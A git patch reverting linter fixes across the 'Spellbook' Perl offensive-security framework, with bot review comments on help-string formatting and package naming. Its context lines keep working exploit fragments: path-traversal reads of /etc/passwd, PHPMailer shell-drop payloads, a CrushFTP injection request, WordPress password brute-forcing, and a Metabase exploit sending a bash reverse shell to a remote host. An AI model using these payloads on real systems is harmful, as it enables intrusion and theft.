From: htrgouvea <hi@heitorgouvea.me> Date: Tue, 3 Dec 2024 16:19:41 +0000 Subject: [PATCH 17/17] Revert "address linter warnings (#113)" This reverts commit dcac3a4215c1b538cf36f4ac50ee416ed2728569. --- lib/Spellbook/Advisory/CVE_2006_3392.pm | 27 ++--- lib/Spellbook/Advisory/CVE_2016_10045.pm | 27 ++--- lib/Spellbook/Advisory/CVE_2017_5487.pm | 25 ++--- lib/Spellbook/Advisory/CVE_2020_9376.pm | 17 ++- lib/Spellbook/Advisory/CVE_2020_9377.pm | 23 ++-- lib/Spellbook/Advisory/CVE_2021_24891.pm | 15 +-- lib/Spellbook/Advisory/CVE_2021_41773.pm | 23 ++-- lib/Spellbook/Advisory/CVE_2023_29489.pm | 21 ++-- lib/Spellbook/Advisory/CVE_2023_38646.pm | 35 +++--- lib/Spellbook/Advisory/CVE_2024_4040.pm | 33 +++--- .../Advisory/Laravel_Ignition_XSS.pm | 19 ++-- lib/Spellbook/Android/APKSign.pm | 19 ++-- lib/Spellbook/Android/Manifest.pm | 28 ++--- lib/Spellbook/Android/Strings.pm | 13 +-- lib/Spellbook/Bruteforce/Facebook.pm | 15 +-- lib/Spellbook/Bruteforce/Instagram.pm | 17 ++- .../Bruteforce/{LinkedIn.pm => Linkedin.pm} | 15 +-- lib/Spellbook/Bruteforce/SMTP.pm | 13 +-- lib/Spellbook/Bruteforce/Twitter.pm | 15 +-- lib/Spellbook/Bruteforce/Wordpress.pm | 21 ++-- lib/Spellbook/Core/Credentials.pm | 21 ++-- lib/Spellbook/Core/Helper.pm | 23 ++-- lib/Spellbook/Core/Module.pm | 27 ++--- lib/Spellbook/Core/Orchestrator.pm | 33 +++--- lib/Spellbook/Exploit/CORS_Misconfig.pm | 19 ++-- lib/Spellbook/Exploit/DataBreach.pm | 17 ++- lib/Spellbook/Exploit/Django_DEBUG.pm | 19 ++-- lib/Spellbook/Exploit/Fullchain_DLINK.pm | 35 +++--- lib/Spellbook/Exploit/HAProxy_Exposed.pm | 17 ++- lib/Spellbook/Exploit/Headers_Misconfig.pm | 17 ++- lib/Spellbook/Exploit/Mixed_Content.pm | 26 ++--- lib/Spellbook/Exploit/None_Attack.pm | 17 ++- lib/Spellbook/Exploit/Pwn_DB.pm | 22 ++-- lib/Spellbook/Exploit/Redis_Unauth.pm | 23 ++-- lib/Spellbook/Exploit/Reflected_XSS.pm | 17 ++- lib/Spellbook/Exploit/S3_Bucket_Takeover.pm | 17 ++- lib/Spellbook/Exploit/Shellshock.pm | 17 ++- 
lib/Spellbook/Exploit/Subdomain_Takeover.pm | 104 +++++++++--------- lib/Spellbook/Exploit/Swagger_XSS.pm | 98 +++++++++-------- lib/Spellbook/Exploit/Upload_Via_PUT.pm | 15 +-- lib/Spellbook/Helper/CDN_Checker.pm | 74 +++++++------ lib/Spellbook/Helper/Exifs_Write.pm | 15 +-- lib/Spellbook/Helper/Generate_UUID.pm | 19 ++-- lib/Spellbook/Helper/Host_Normalization.pm | 15 +-- lib/Spellbook/Helper/Permutations.pm | 21 ++-- lib/Spellbook/Helper/Read_File.pm | 41 ++++--- lib/Spellbook/Helper/Reverse_Shell.pm | 21 ++-- lib/Spellbook/Helper/Scope.pm | 29 +++-- lib/Spellbook/Helper/Uniq.pm | 13 +-- lib/Spellbook/Parser/Nmap.pm | 23 ++-- lib/Spellbook/Parser/Nozaki.pm | 13 +-- lib/Spellbook/Parser/S3_Bucket.pm | 21 ++-- lib/Spellbook/Parser/Sitemap.pm | 17 ++- lib/Spellbook/Platform/HackerOne.pm | 19 ++-- lib/Spellbook/Platform/Intigriti.pm | 11 +- lib/Spellbook/Recon/DNS_Bruteforce.pm | 19 ++-- lib/Spellbook/Recon/Detect_Error.pm | 17 ++- lib/Spellbook/Recon/Dorking.pm | 12 +- lib/Spellbook/Recon/Extract_Links.pm | 23 ++-- lib/Spellbook/Recon/Find_Emails.pm | 15 +-- lib/Spellbook/Recon/Get_IP.pm | 15 +-- lib/Spellbook/Recon/HTTP_Probe.pm | 17 ++- lib/Spellbook/Recon/HaveBeenPwned.pm | 15 +-- lib/Spellbook/Recon/Host_Resolv.pm | 17 ++- lib/Spellbook/Recon/Internal_DNS.pm | 13 +-- lib/Spellbook/Recon/Masscan.pm | 33 +++--- lib/Spellbook/Recon/Nmap_Scanner.pm | 29 +++-- lib/Spellbook/Recon/Query_Shodan.pm | 15 +-- lib/Spellbook/Recon/Shodan_Enumeration.pm | 15 +-- lib/Spellbook/Recon/Subdomain_Enumeration.pm | 17 ++- lib/Spellbook/Recon/Technologies.pm | 15 +-- lib/Spellbook/Recon/WayBackUrls.pm | 19 ++-- spellbook.pl | 4 +- 73 files changed, 725 insertions(+), 942 deletions(-) rename lib/Spellbook/Bruteforce/{LinkedIn.pm => Linkedin.pm} (68%) diff --git a/lib/Spellbook/Advisory/CVE_2006_3392.pm b/lib/Spellbook/Advisory/CVE_2006_3392.pm index 90f5e12..211e06a 100644 --- a/lib/Spellbook/Advisory/CVE_2006_3392.pm +++ b/lib/Spellbook/Advisory/CVE_2006_3392.pm 
@@ -2,7 +2,7 @@ package Spellbook::Advisory::CVE_2006_3392 { use strict; use warnings; use Spellbook::Core::UserAgent; - + sub new { my ($self, $parameters) = @_; my ($help, $target, $file); @@ -15,27 +15,24 @@ package Spellbook::Advisory::CVE_2006_3392 { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } - + my $userAgent = Spellbook::Core::UserAgent -> new(); my $temp = "/..%01" x 40; my $request = $userAgent -> get($target . "/unauthenticated/" . $temp . $file); - - return $request -> content(); - } + + return $request -> content(); + } if ($help) { - return <<"EOT"; - -Exploit::CVE_2006_3392 -======================= --h, --help See this menu --t, --target Define a target --f, --file Define a file to read - -EOT + return " + \rExploit::CVE_2006_3392 + \r======================= + \r-h, --help See this menu + \r-t, --target Define a target + \r-f, --file Define a file to read\n\n"; } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2016_10045.pm b/lib/Spellbook/Advisory/CVE_2016_10045.pm index a53742f..6c7a61f 100644 --- a/lib/Spellbook/Advisory/CVE_2016_10045.pm +++ b/lib/Spellbook/Advisory/CVE_2016_10045.pm @@ -7,7 +7,7 @@ package Spellbook::Advisory::CVE_2016_10045 { sub new { my ($self, $parameters) = @_; my ($help, $target, @results); - + my $dir = "/var/www/html/uploads"; my %shell = ( "name" => "spellbook_xpl.php", @@ -21,9 +21,9 @@ package Spellbook::Advisory::CVE_2016_10045 { "S|shell=s" => \$shell{name}, "d|directory=s" => \$dir ); - + if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } 
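Review bot: The help string restored at `@@ -15,27 +15,24 @@` (`return " \rExploit::CVE_2006_3392 ...`) relies on a `\r` at the start of each line to hide what is presumably source indentation. That works on a terminal but leaves the indentation and CR bytes in the output when it is redirected to a file or read by another tool. The heredocs being reverted had their own defect in some files (a stray `\n\n";` left in the body), so fixing that forward would keep the output clean. If the revert stays, a comment such as `# \r overwrites the source indentation on a terminal` would explain the idiom. The same form is restored in every help-text hunk of this revert.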
@@ -34,10 +34,10 @@ package Spellbook::Advisory::CVE_2016_10045 { $shell{code} = $code -> slurp(); } - + my $CVE_2016_10033 = "\"attacker\\\" -oQ/tmp/ -X$dir/$shell{name} some\"\@email.com"; my $CVE_2016_10045 = "\"attacker\\' -oQ/tmp/ -X$dir/$shell{name} some\"\@email.com"; - + try { my $request = $userAgent -> post($target, [ "action" => "send", @@ -62,16 +62,13 @@ package Spellbook::Advisory::CVE_2016_10045 { } if ($help) { - return<<"EOT"; - -Exploit::CVE_2016_10045 -======================= --h, --help See this menu --t, --target Define a target --S, --shell --d, --directory \n\n"; - -EOT + return " + \rExploit::CVE_2016_10045 + \r======================= + \r-h, --help See this menu + \r-t, --target Define a target + \r-S, --shell + \r-d, --directory \n\n"; } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2017_5487.pm b/lib/Spellbook/Advisory/CVE_2017_5487.pm index 4d2f6f3..c10b3eb 100755 --- a/lib/Spellbook/Advisory/CVE_2017_5487.pm +++ b/lib/Spellbook/Advisory/CVE_2017_5487.pm @@ -15,11 +15,11 @@ package Spellbook::Advisory::CVE_2017_5487 { "t|target=s" => \$target ); - if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target) { + if ($target !~ /^http(s)?:\/\//x) { $target = "http://$target"; } - + my $userAgent = Spellbook::Core::UserAgent -> new(); my $request = $userAgent -> get("$target/wp-json/wp/v2/users"); @@ -29,11 +29,11 @@ package Spellbook::Advisory::CVE_2017_5487 { foreach my $data (@$content) { my $username = $data -> {slug}; - + if ($username) { push @result, $username; } - } + } }; return @result; @@ -42,17 +42,14 @@ package Spellbook::Advisory::CVE_2017_5487 { } if ($help) { - return<<"EOT"; - -Exploit::CVE_2017_5487 -======================= --h, --help See this menu -r-t, --target Define a target\n\n"; - -EOT + return " + \rExploit::CVE_2017_5487 + \r======================= + \r-h, --help See this menu + \r-t, --target Define a target\n\n"; } - return 0; + return 0; } } 
diff --git a/lib/Spellbook/Advisory/CVE_2020_9376.pm b/lib/Spellbook/Advisory/CVE_2020_9376.pm index a07175f..2eb317d 100644 --- a/lib/Spellbook/Advisory/CVE_2020_9376.pm +++ b/lib/Spellbook/Advisory/CVE_2020_9376.pm @@ -3,7 +3,7 @@ package Spellbook::Advisory::CVE_2020_9376 { use warnings; use Mojo::DOM; use Spellbook::Core::UserAgent; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @results); @@ -15,7 +15,7 @@ package Spellbook::Advisory::CVE_2020_9376 { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "http://$target"; } @@ -38,14 +38,11 @@ package Spellbook::Advisory::CVE_2020_9376 { } if ($help) { - return<<"EOT"; - -Advisory::CVE_2020_9376 -======================= --h, --help See this menu --t, --target Define a target to exploit\n\n"; - -EOT + return " + \rAdvisory::CVE_2020_9376 + \r======================= + \r-h, --help See this menu + \r-t, --target Define a target to exploit\n\n"; } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2020_9377.pm b/lib/Spellbook/Advisory/CVE_2020_9377.pm index d5349b8..5cac0b5 100644 --- a/lib/Spellbook/Advisory/CVE_2020_9377.pm +++ b/lib/Spellbook/Advisory/CVE_2020_9377.pm @@ -2,7 +2,7 @@ package Spellbook::Advisory::CVE_2020_9377 { use strict; use warnings; use Spellbook::Core::UserAgent; - + sub new { my ($self, $parameters) = @_; my ($help, $target, $cookie, $command, @results); @@ -16,13 +16,13 @@ package Spellbook::Advisory::CVE_2020_9377 { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "http://$target"; } my $userAgent = Spellbook::Core::UserAgent -> new(); my $payload = "cmd=$command"; - + my $headers = HTTP::Headers -> new ( "Content-Type" => "application/x-www-form-urlencoded", "Cookie" => "uid=$cookie" 
@@ -39,16 +39,13 @@ package Spellbook::Advisory::CVE_2020_9377 { } if ($help) { - return<<"EOT"; - -Advisory::CVE_2020_9377 -======================= --h, --help See this menu --t, --target Define a target --c, --cookie Define a session cookie --p, --payload Set the command to run on the target\n\n"; - -EOT + return " + \rAdvisory::CVE_2020_9377 + \r======================= + \r-h, --help See this menu + \r-t, --target Define a target + \r-c, --cookie Define a session cookie + \r-p, --payload Set the command to run on the target\n\n"; } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2021_24891.pm b/lib/Spellbook/Advisory/CVE_2021_24891.pm index f3197ea..ee0d49f 100644 --- a/lib/Spellbook/Advisory/CVE_2021_24891.pm +++ b/lib/Spellbook/Advisory/CVE_2021_24891.pm @@ -14,7 +14,7 @@ package Spellbook::Advisory::CVE_2021_24891 { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } @@ -44,14 +44,11 @@ package Spellbook::Advisory::CVE_2021_24891 { } if ($help) { - return<<"EOT"; - -Advisory::CVE_2021_24891 -======================= --h, --help See this menu --t, --target Define a target\n\n"; - -EOT + return " + \rAdvisory::CVE_2021_24891 + \r======================= + \r-h, --help See this menu + \r-t, --target Define a target\n\n"; } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2021_41773.pm b/lib/Spellbook/Advisory/CVE_2021_41773.pm index 1fe890a..3bbae0d 100644 --- a/lib/Spellbook/Advisory/CVE_2021_41773.pm +++ b/lib/Spellbook/Advisory/CVE_2021_41773.pm @@ -16,10 +16,10 @@ package Spellbook::Advisory::CVE_2021_41773 { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } - + if (!$file) { $file = "/etc/passwd"; } my $payload = "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/"; 
@@ -34,7 +34,7 @@ package Spellbook::Advisory::CVE_2021_41773 { my $useragent = Spellbook::Core::UserAgent -> new(); my $request = $useragent -> get( - "https://" . $target . $payload, + "https://" . $target . $payload, Content => $command || " " ); @@ -44,16 +44,13 @@ package Spellbook::Advisory::CVE_2021_41773 { } if ($help) { - return<<"EOT"; - -Exploit::CVE_2021_41773 -======================= --h, --help See this menu --t, --target Define a target --f, --file Define a file to read --c, --command Arbitrary code execution\n\n"; - -EOT + return " + \rExploit::CVE_2021_41773 + \r======================= + \r-h, --help See this menu + \r-t, --target Define a target + \r-f, --file Define a file to read + \r-c, --command Arbitrary code execution\n\n"; } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2023_29489.pm b/lib/Spellbook/Advisory/CVE_2023_29489.pm index 59e4b58..8f69a94 100644 --- a/lib/Spellbook/Advisory/CVE_2023_29489.pm +++ b/lib/Spellbook/Advisory/CVE_2023_29489.pm @@ -13,11 +13,11 @@ package Spellbook::Advisory::CVE_2023_29489 { "t|target=s" => \$target ); - if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target) { + if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } - + my $userAgent = Spellbook::Core::UserAgent -> new(); my @payloads = ( @@ -39,17 +39,14 @@ package Spellbook::Advisory::CVE_2023_29489 { } if ($help) { - return<<"EOT"; - -Exploit::CVE_2023_29489 -======================= --h, --help See this menu --t, --target Define a target\n\n"; - -EOT + return " + \rExploit::CVE_2023_29489 + \r======================= + \r-h, --help See this menu + \r-t, --target Define a target\n\n"; } - return 0; + return 0; } } diff --git a/lib/Spellbook/Advisory/CVE_2023_38646.pm b/lib/Spellbook/Advisory/CVE_2023_38646.pm index 966b399..2660ce3 100644 --- a/lib/Spellbook/Advisory/CVE_2023_38646.pm +++ b/lib/Spellbook/Advisory/CVE_2023_38646.pm 
@@ -23,23 +23,23 @@ package Spellbook::Advisory::CVE_2023_38646 { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } my $userAgent = Spellbook::Core::UserAgent -> new(); - my $initial_request = $userAgent -> get("$target/api/session/properties"); + my $request = $userAgent -> get("$target/api/session/properties"); - if ($initial_request -> code() == 200) { + if ($request -> code() == 200) { try { - my $content = decode_json($initial_request -> content); + my $content = decode_json($request -> content); my $token = $content -> {"setup-token"}; if ($token) { my $headers = HTTP::Headers -> new ("Content-Type" => "application/json"); my $reverse = encode_base64("bash -i >& /dev/tcp/$remote/$port 0>&1", ""); - my $payload = { + my $payload = qq({ "token": "$token", "details": { "is_on_demand": false, @@ -57,12 +57,10 @@ package Spellbook::Advisory::CVE_2023_38646 { "name": "an-sec-research-team", "engine": "h2" } - }; + }); - my $json_payload = encode_json($payload); - - my $exploit_request = HTTP::Request -> new("POST", "$target/api/setup/validate", $headers, $payload); - my $response = $userAgent -> request($exploit_request); + my $request = HTTP::Request -> new("POST", "$target/api/setup/validate", $headers, $payload); + my $response = $userAgent -> request($request); if ($response -> code() == 400) { push @result, "\n[+] $target exploited\n"; 
@@ -75,16 +73,13 @@ package Spellbook::Advisory::CVE_2023_38646 { } if ($help) { - return<<"EOT"; - -Exploit::CVE_2023_38646 -======================= --h, --help See this menu --t, --target Define a target --r, --remote Set the address to receive the reverse shell --p, --port Set the port of reverse shell\n\n"; - -EOT + return " + \rExploit::CVE_2023_38646 + \r======================= + \r-h, --help See this menu + \r-t, --target Define a target + \r-r, --remote Set the address to receive the reverse shell + \r-p, --port Set the port of reverse shell\n\n"; } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2024_4040.pm b/lib/Spellbook/Advisory/CVE_2024_4040.pm index c162fe7..336f0e4 100644 --- a/lib/Spellbook/Advisory/CVE_2024_4040.pm +++ b/lib/Spellbook/Advisory/CVE_2024_4040.pm @@ -17,18 +17,18 @@ package Spellbook::Advisory::CVE_2024_4040 { "payload=s" => \$payload, "help" => \$help ); - + if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } - + my $endpoint = "$target/WebInterface/"; my $userAgent = Spellbook::Core::UserAgent -> new(); my $cookie_jar = HTTP::Cookies -> new(); - + $userAgent -> cookie_jar($cookie_jar); - + my $response = $userAgent -> post($endpoint); $cookie_jar -> extract_cookies($response); @@ -36,12 +36,12 @@ package Spellbook::Advisory::CVE_2024_4040 { my $cookies = $response -> header("Set-Cookie"); - if ($cookies =~ /currentAuth=([^;]+)/x) { - $response = $userAgent -> post($endpoint, - Content_Type => "application/x-www-form-urlencoded", + if ($cookies =~ /currentAuth=([^;]+)/x) { + $response = $userAgent -> post($endpoint, + Content_Type => "application/x-www-form-urlencoded", Content => "command=exists&paths=<INCLUDE>$payload</INCLUDE>&c2f=$1" ); - + push @result, $response -> decoded_content(); } 
@@ -49,15 +49,12 @@ package Spellbook::Advisory::CVE_2024_4040 { } if ($help) { - return<<"EOT"; - -Advisory::CVE_2024_4040 -======================================== --h, --help See this menu --u, --target Define the targeted CrushFTP server URL --p, --payload Set the payload to run on the target\n\n"; - -EOT + return " + \rAdvisory::CVE_2024_4040 + \r======================================== + \r-h, --help See this menu + \r-u, --target Define the targeted CrushFTP server URL + \r-p, --payload Set the payload to run on the target\n\n"; } return 0; diff --git a/lib/Spellbook/Advisory/Laravel_Ignition_XSS.pm b/lib/Spellbook/Advisory/Laravel_Ignition_XSS.pm index 5d29c85..489c545 100644 --- a/lib/Spellbook/Advisory/Laravel_Ignition_XSS.pm +++ b/lib/Spellbook/Advisory/Laravel_Ignition_XSS.pm @@ -15,10 +15,10 @@ package Spellbook::Advisory::Laravel_Ignition_XSS { ); if ($target) { - if ($target !~ /^http(?:s)?:\/\//x) { + if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } - + my @uuid = Spellbook::Helper::Generate_UUID -> new(["--version" => 4, "--repeat" => 1]); my $payload = "$target/_ignition/scripts/--%3E%3Csvg%20onload=alert%28$uuid[0]%29%3E"; my $userAgent = Spellbook::Core::UserAgent -> new(); @@ -31,19 +31,16 @@ package Spellbook::Advisory::Laravel_Ignition_XSS { ) { push @results, $target; } - + return @results; } if ($help) { - return<<"EOT"; - -Advisory::CVE_ -======================= --h, --help See this menu --t, --target Define a target\n\n"; - -EOT + return " + \rAdvisory::CVE_ + \r======================= + \r-h, --help See this menu + \r-t, --target Define a target\n\n"; } return 0; diff --git a/lib/Spellbook/Android/APKSign.pm b/lib/Spellbook/Android/APKSign.pm index 7250745..58745de 100755 --- a/lib/Spellbook/Android/APKSign.pm +++ b/lib/Spellbook/Android/APKSign.pm 
@@ -21,18 +21,15 @@ package Spellbook::Android::APKSign { } if ($help) { - return<<"EOT"; - -Android::APKSign -================ --h, --help See this menu --a, --apk Pass the APK file --n, --name Set de package name --p, --password Define a password\n"; - -EOT + return " + \rAndroid::APKSign + \r================ + \r-h, --help See this menu + \r-a, --apk Pass the APK file + \r-n, --name Set de package name + \r-p, --password Define a password\n"; } - + return 0; } } diff --git a/lib/Spellbook/Android/Manifest.pm b/lib/Spellbook/Android/Manifest.pm index 57fc37f..065953f 100755 --- a/lib/Spellbook/Android/Manifest.pm +++ b/lib/Spellbook/Android/Manifest.pm @@ -27,27 +27,21 @@ package Spellbook::Android::Manifest { # Exported Android Components # Access to protected intents via exported Activities # Access to sensitive data via exported Activity - - return join("\n", - "[ - ] -> Package name: $package", - "[ - ] -> Debug: $debug", - "[ - ] -> Backup: $backup", - "", - "" - ); + + return " + \r[ - ] -> Package name: $package + \r[ - ] -> Debug: $debug + \r[ - ] -> Backup: $backup\n\n"; } if ($help) { - return<<"EOT"; - -Android::Manifest -============== --h, --help See this menu --f, --file Pass the AndroidManifest.xml file\n\n"; - -EOT + return " + \rAndroid::Manifest + \r============== + \r-h, --help See this menu + \r-f, --file Pass the AndroidManifest.xml file\n\n"; } - + return 0; } } diff --git a/lib/Spellbook/Android/Strings.pm b/lib/Spellbook/Android/Strings.pm index 79cf20d..3bb0b51 100755 --- a/lib/Spellbook/Android/Strings.pm +++ b/lib/Spellbook/Android/Strings.pm @@ -12,20 +12,17 @@ package Spellbook::Android::Strings { # resources.arsc/strings.xml # res/xml/file_paths.xml - + # if (Dumper($data) =~ m/:\/\//) { # return "true"; # } } if ($help) { - return<<"EOT"; - -Android:: -================ --h, --help See this menu\n"; - -EOT + return " + \rAndroid:: + \r================ + \r-h, --help See this menu\n"; } return 0; 
diff --git a/lib/Spellbook/Bruteforce/Facebook.pm b/lib/Spellbook/Bruteforce/Facebook.pm index 004034b..7f291ef 100644 --- a/lib/Spellbook/Bruteforce/Facebook.pm +++ b/lib/Spellbook/Bruteforce/Facebook.pm @@ -1,7 +1,7 @@ package Spellbook::Bruteforce::Facebook { use strict; use warnings; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); @@ -18,14 +18,11 @@ package Spellbook::Bruteforce::Facebook { } if ($help) { - return<<"EOT"; - -Bruteforce::Facebook -===================== --h, --help See this menu --t, --target \n\n"; - -EOT + return " + \rBruteforce::Facebook + \r===================== + \r-h, --help See this menu + \r-t, --target \n\n"; } } } diff --git a/lib/Spellbook/Bruteforce/Instagram.pm b/lib/Spellbook/Bruteforce/Instagram.pm index 7f99fe3..d1d5022 100644 --- a/lib/Spellbook/Bruteforce/Instagram.pm +++ b/lib/Spellbook/Bruteforce/Instagram.pm @@ -18,18 +18,15 @@ package Spellbook::Bruteforce::Instagram { if ($username) { my $useragent = LWP::UserAgent -> new(); - } + } if ($help) { - return<<"EOT"; - -Exploit::Brute_Force_Instagram -======================= --h, --help See this menu --u, --username Define a username --f, --file Define a file to read\n\n"; - -EOT + return " + \rExploit::Brute_Force_Instagram + \r======================= + \r-h, --help See this menu + \r-u, --username Define a username + \r-f, --file Define a file to read\n\n"; } return 0; diff --git a/lib/Spellbook/Bruteforce/LinkedIn.pm b/lib/Spellbook/Bruteforce/Linkedin.pm similarity index 68% rename from lib/Spellbook/Bruteforce/LinkedIn.pm rename to lib/Spellbook/Bruteforce/Linkedin.pm index 8b6a8e7..d59352d 100644 --- a/lib/Spellbook/Bruteforce/LinkedIn.pm +++ b/lib/Spellbook/Bruteforce/Linkedin.pm @@ -1,7 +1,7 @@ package Spellbook::Bruteforce::LinkedIn { use strict; use warnings; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); 
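Review bot: The rename to `Linkedin.pm` leaves the package line as `package Spellbook::Bruteforce::LinkedIn`, so the file name and the package name no longer agree. Core::Module, as changed later in this patch, uses one module name both for `require "Spellbook/<Category>/<module>.pm"` and for the `"Spellbook::$name" -> new(...)` call. Whichever spelling the module list carries, either the file is not found on a case-sensitive filesystem or `new` is looked up in a package that does not exist. Keep the two identical, e.g. `package Spellbook::Bruteforce::Linkedin {`. The Django_DEBUG.pm hunk has the mirror-image problem: the package becomes `Spellbook::Exploit::Django_Debug` while the file keeps its old name.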
@@ -18,14 +18,11 @@ package Spellbook::Bruteforce::LinkedIn { } if ($help) { - return<<"EOT"; - -Bruteforce::LinkedIn -===================== --h, --help See this menu --t, --target \n\n"; - -EOT + return " + \rBruteforce::LinkedIn + \r===================== + \r-h, --help See this menu + \r-t, --target \n\n"; } } } diff --git a/lib/Spellbook/Bruteforce/SMTP.pm b/lib/Spellbook/Bruteforce/SMTP.pm index d976736..727b096 100644 --- a/lib/Spellbook/Bruteforce/SMTP.pm +++ b/lib/Spellbook/Bruteforce/SMTP.pm @@ -18,14 +18,11 @@ package Spellbook::Bruteforce::SMTP { } if ($help) { - return<<"EOT"; - -Bruteforce::SMTP -===================== --h, --help See this menu --t, --target \n\n"; - -EOT + return " + \rBruteforce::SMTP + \r===================== + \r-h, --help See this menu + \r-t, --target \n\n"; } } } diff --git a/lib/Spellbook/Bruteforce/Twitter.pm b/lib/Spellbook/Bruteforce/Twitter.pm index cd1b3ed..d094ea4 100644 --- a/lib/Spellbook/Bruteforce/Twitter.pm +++ b/lib/Spellbook/Bruteforce/Twitter.pm @@ -1,7 +1,7 @@ package Spellbook::Bruteforce::Twitter { use strict; use warnings; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); @@ -18,14 +18,11 @@ package Spellbook::Bruteforce::Twitter { } if ($help) { - return<<"EOT"; - -Bruteforce::Twitter -===================== --h, --help See this menu --t, --target \n\n"; - -EOT + return " + \rBruteforce::Twitter + \r===================== + \r-h, --help See this menu + \r-t, --target \n\n"; } } } diff --git a/lib/Spellbook/Bruteforce/Wordpress.pm b/lib/Spellbook/Bruteforce/Wordpress.pm index f19689e..b204b07 100644 --- a/lib/Spellbook/Bruteforce/Wordpress.pm +++ b/lib/Spellbook/Bruteforce/Wordpress.pm @@ -3,7 +3,6 @@ package Spellbook::Bruteforce::Wordpress { use warnings; use LWP::UserAgent; use HTTP::Request::Common; - use Carp qw(croak); # THIS IS A DRAFT MODULE 
@@ -19,32 +18,28 @@ package Spellbook::Bruteforce::Wordpress { ); if ($target) { - open(my $wordlist, "<", "./files/rockyou.txt") - or croak "Could not open wordlist file: $!"; - my @passwords = <$wordlist>; - close($wordlist) or croak "Could not close wordlist file: $!"; + open(my $wordlist, "<", "./files/rockyou.txt"); - chomp(@passwords); + while (<$wordlist>) { + chomp ($_); - foreach my $password (@passwords) { my $useragent = LWP::UserAgent->new; my $response = $useragent -> request(POST $target, [ log => $username, - pwd => $password, + pwd => $_, ]); if ($response -> is_success) { - print "Successfully logged in with password: $password \n"; - last; + print "Successfully logged in with password: $_ \n"; } } + + close($wordlist); } if ($help) { - return<<"EOT"; - -EOT + return ""; } return 0; diff --git a/lib/Spellbook/Core/Credentials.pm b/lib/Spellbook/Core/Credentials.pm index 309d19f..f12d6e8 100644 --- a/lib/Spellbook/Core/Credentials.pm +++ b/lib/Spellbook/Core/Credentials.pm @@ -15,14 +15,14 @@ package Spellbook::Core::Credentials { "p|platform=s" => \$platform, "v|value=s" => \$value, ); - + if ($platform) { my $credentials = Mojo::File -> new(".config/credentials.json"); my $data = $credentials -> slurp(); my $content = decode_json($data); - if ($value) { + if ($value) { $content -> {$platform} = $value; $credentials -> spurt(encode_json($content)); } @@ -31,17 +31,14 @@ package Spellbook::Core::Credentials { } if ($help) { - return<<"EOT"; - -Core::Credentials -============== --h, --help See this menu --p, --platform Read some credentials filtering by platform --v, --value Define a value of a platform\n\n"; - -EOT + return " + \rCore::Credentials + \r============== + \r-h, --help See this menu + \r-p, --platform Read some credentials filtering by platform + \r-v, --value Define a value of a platform\n\n"; } - + return 0; } } diff --git a/lib/Spellbook/Core/Helper.pm b/lib/Spellbook/Core/Helper.pm index e77fe88..f50f568 100644 
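Review bot: `open(my $wordlist, "<", "./files/rockyou.txt");` no longer checks its result and `close($wordlist);` is unchecked too, so a missing or unreadable wordlist makes the `while` loop read from an unopened handle and the module returns as if it had run. The check can stay without Carp: `open(my $wordlist, "<", "./files/rockyou.txt") or die "Could not open wordlist file: $!";`. The loop also keeps its line in the global `$_` across the `$useragent -> request(...)` call, where any callee may change it; `while (my $password = <$wordlist>) {` followed by `chomp $password;` keeps the value lexical.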
--- a/lib/Spellbook/Core/Helper.pm +++ b/lib/Spellbook/Core/Helper.pm @@ -3,18 +3,17 @@ package Spellbook::Core::Helper { use warnings; sub new { - return<<"EOT"; - -Spellbook v0.3.6 -Core Commands -============== -Command Description -------- ----------- --s, --search List modules, you can filter by category --m, --module Define a module to use --h, --help To see help menu of a module\n\n"; - -EOT + print " + \rSpellbook v0.3.6 + \rCore Commands + \r============== + \r\tCommand Description + \r\t------- ----------- + \r\t-s, --search List modules, you can filter by category + \r\t-m, --module Define a module to use + \r\t-h, --help To see help menu of a module\n\n"; + + return 1; } } diff --git a/lib/Spellbook/Core/Module.pm b/lib/Spellbook/Core/Module.pm index 82b3a7f..cb54b7e 100644 --- a/lib/Spellbook/Core/Module.pm +++ b/lib/Spellbook/Core/Module.pm @@ -2,31 +2,20 @@ package Spellbook::Core::Module { use strict; use warnings; use Spellbook::Core::Resources; - use Carp qw(croak); sub new { my ($self, $module, @parameters) = @_; - my $resources = Spellbook::Core::Resources->new(); + my $resources = Spellbook::Core::Resources -> new(); - foreach my $package (@{$resources->{modules}}) { - my $category = ucfirst $package->{category}; - my $name = $category . "::" . $package->{module}; + foreach my $package (@{$resources -> {modules}}) { + my $category = ucfirst $package -> {category}; + my $name = $category . "::" . $package -> {module}; - if ($name eq $module) { - my $module_path = "Spellbook::" . $category . "::" . $package->{module}; + if ($name eq $module) { + require "Spellbook/" . $category . "/" . $package -> {module} . ".pm"; - my $success = eval { - require Module::Load; - Module::Load::load($module_path); - 1; - }; - - if (!$success || $@) { - croak "Failed to load module $module_path: $@"; - } - - my @run = $module_path->new(@parameters); + my @run = "Spellbook::$name" -> new(@parameters); my @results; foreach my $result 